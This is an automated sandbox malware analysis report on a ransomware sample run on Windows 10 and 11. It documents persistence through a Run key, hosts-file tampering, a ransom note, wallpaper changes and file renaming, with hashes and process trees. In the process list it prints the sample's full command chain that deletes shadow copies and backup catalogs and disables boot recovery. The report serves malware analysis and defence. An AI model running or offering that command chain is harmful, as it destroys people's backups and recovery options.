Malware Analysis Report

2025-08-05 15:06

Sample ID 250519-r8gkpazmv6
Target 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry
SHA256 c032b020f742add231aa1b02c90240cc702d81ccd255c015284c1389ef1e7b6c
Tags
defense_evasion discovery execution impact persistence ransomware
score
9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
9/10

SHA256

c032b020f742add231aa1b02c90240cc702d81ccd255c015284c1389ef1e7b6c

Threat Level: Likely malicious

The file 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion discovery execution impact persistence ransomware

Renames multiple (66) files with added filename extension

Deletes shadow copies

Renames multiple (67) files with added filename extension

Drops file in Drivers directory

Executes dropped EXE

Checks computer location settings

Drops desktop.ini file(s)

Adds Run key to start application

Drops file in System32 directory

Sets desktop wallpaper using registry

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of SendNotifyMessage

Opens file in notepad (likely ransom note)

NTFS ADS

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-05-19 14:51

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-05-19 14:51

Reported

2025-05-19 14:54

Platform

win10v2004-20250502-en

Max time kernel

131s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (67) files with added filename extension

ransomware

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\discord.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\discord.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\discord.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Local\\discord.exe" C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Local\\discord.exe" C:\Users\Admin\AppData\Local\discord.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\Ñ:\APEXGO.exe.exe C:\Windows\SysWOW64\cmd.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Pictures\\imagexSIxnnbNiOVYwyIIHwotgPgRNKhzjW.jpg" C:\Users\Admin\AppData\Local\discord.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Pictures\\imageJYnansNC=fMcPGKpJKetnruH=HVMRU.jpg" C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NOTEPAD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NOTEPAD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\discord.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\discord.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Temp\Ñ:\APEXGO.exe.exe C:\Windows\SysWOW64\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\discord.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\discord.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\discord.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1712 wrote to memory of 1148 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\discord.exe
PID 1712 wrote to memory of 1148 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\discord.exe
PID 1712 wrote to memory of 1148 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\discord.exe
PID 1148 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 1148 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 1148 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 4160 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 4160 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 4160 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 4160 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 1148 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 1148 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 1148 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 1148 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 1148 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 1148 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 956 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 956 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 956 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4372 wrote to memory of 4212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4372 wrote to memory of 4212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4372 wrote to memory of 4212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe

"C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\discord.exe

C:\Users\Admin\AppData\Local\discord.exe

C:\Users\Admin\AppData\Local\discord.exe

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\APEXNOTE.txt

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\APEXNOTE.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\usb_maker.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\usb_maker.bat" "

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
GB 2.18.27.82:443 www.bing.com tcp
GB 2.18.27.82:443 www.bing.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp

Files

memory/4160-0-0x000000007477E000-0x000000007477F000-memory.dmp

memory/4160-1-0x0000000000E10000-0x0000000000E48000-memory.dmp

memory/4160-2-0x0000000005D00000-0x00000000062A4000-memory.dmp

memory/4160-3-0x0000000005830000-0x00000000058C2000-memory.dmp

memory/4160-4-0x0000000074770000-0x0000000074F20000-memory.dmp

memory/4160-5-0x0000000005970000-0x000000000597A000-memory.dmp

C:\Users\Admin\AppData\Local\discord.exe

MD5 b35a7c0c23349c34d7eaa11be87681b3
SHA1 265a3a1b889a9f3f5bb53f9e5d1cbc7f48d24fe8
SHA256 c032b020f742add231aa1b02c90240cc702d81ccd255c015284c1389ef1e7b6c
SHA512 67a8c9eb39da8f24a48acee027706052d68b59cbad05e9028bafb70ba77a562c8ae1b72c375bcd03ea1846775c577bff005ed148ba8dd0963673c91144846dd2

memory/1148-23-0x0000000074770000-0x0000000074F20000-memory.dmp

memory/1148-26-0x0000000074770000-0x0000000074F20000-memory.dmp

C:\Users\Admin\AppData\Roaming\ID

MD5 ff1447561eae283bddeb71e3ea3168cb
SHA1 3399abb7e65489ccddc2118079c1ec2ce2f5404f
SHA256 915cd36509e6360c2e35301430765ddc70a37057109c4806c7837452431d8b02
SHA512 7e50186680e387a137c67f247201afe5809891050784a15ca510435e40947de6f3efb07db5e921bfda94a3e26927b2b833cdf4d1b66a3d7400d7fe3453aa7bad

C:\Users\Admin\AppData\Roaming\fondo_antiguo.jpg

MD5 25342190bcc364d32b9e9f9928b5a8a5
SHA1 3ae3bdabaed70dba1fd96c0be72e17aa91c7802a
SHA256 d626e482d44f5fc8eb1c9b2cd08070150ab99afe40cf6dc939015b01b09088f4
SHA512 c0f4f1831f289d4d60e9323e36689c2e0aaa9a7de3dbe4e65b2974d26d3f6f480a7160f5eff2ad458f8b0a7f36057bfba9c7a1b62769091b02640176bd2e53c3

C:\Users\Admin\Pictures\imagexSIxnnbNiOVYwyIIHwotgPgRNKhzjW.jpg

MD5 23dcba6ae05640c3c9c1621cd9f4cd7f
SHA1 0b6ecd44bac5a58ba27dfdb26d9a8759723f1e3f
SHA256 f7fc0500d8f3b0596e080a801561a86ce76670e85461c9a56537a011dbd595b0
SHA512 11ac6c8fc9c45043757b7e0c2c9704c5ef75bd7b80794dbf0eea0a3c0d672164feb6e56d5685e4b8ef7c629394526794a9f32e0d093c6ffbfd7e3520002da18b

C:\Windows\System32\drivers\etc\hosts

MD5 de941294418545204a4ec21837641098
SHA1 5b6c90046d37841e0096b1f85d021836f2b09639
SHA256 1d7320e6895f426fe4f7bf535b0a63e8308202a6d1a7b790498c45ad5fc58cea
SHA512 fcecb0fee780eda474576afb6fa799fadb5a82d1eb725f93bdcdc4bd7617361f254d03510cbb7f50b1f056e15dd51f56d4a5027e21b4d6289a5e283e0a6b0daf

C:\Users\Admin\Downloads\APEXNOTE.txt

MD5 bdba72b1177bdfc5dee1d9941fdcae45
SHA1 a7713959c8f0a6d8d7a6169665e87b009ac04b10
SHA256 dd1e78ae51782f025cad303019e331c493d20bc0f7f71c0c186a85be24ee13be
SHA512 3eca03cd090b483beb4e2009a535905ce6ac8100782f46dd681db1e2e25960cd854d303f2820225581b6e25a89925f0199fa022887a5c3c59f53297eb0884b5a

C:\Users\Admin\AppData\Roaming\usb_maker.bat

MD5 2e8e30afd640ba60cee4644e27efecf2
SHA1 31f6a7727c6b40419715b769d6a60b3872868b5b
SHA256 034c79570dc0d54160ed0d3b4435bf4fdcae10a0d2ab688348f112f399d6ea14
SHA512 052401dbc296664301a8b0522296c3af22ddc1b36d3e782bcda2709b20aa47085cdf080bb536c34533c1d595768e21035112060f3672e3b82d5e23001c41f76b

memory/1148-331-0x0000000074770000-0x0000000074F20000-memory.dmp

memory/4160-333-0x0000000074770000-0x0000000074F20000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-05-19 14:51

Reported

2025-05-19 14:54

Platform

win11-20250502-en

Max time kernel

102s

Max time network

106s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (66) files with added filename extension

ransomware

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\discord.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\discord.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Local\\discord.exe" C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Local\\discord.exe" C:\Users\Admin\AppData\Local\discord.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
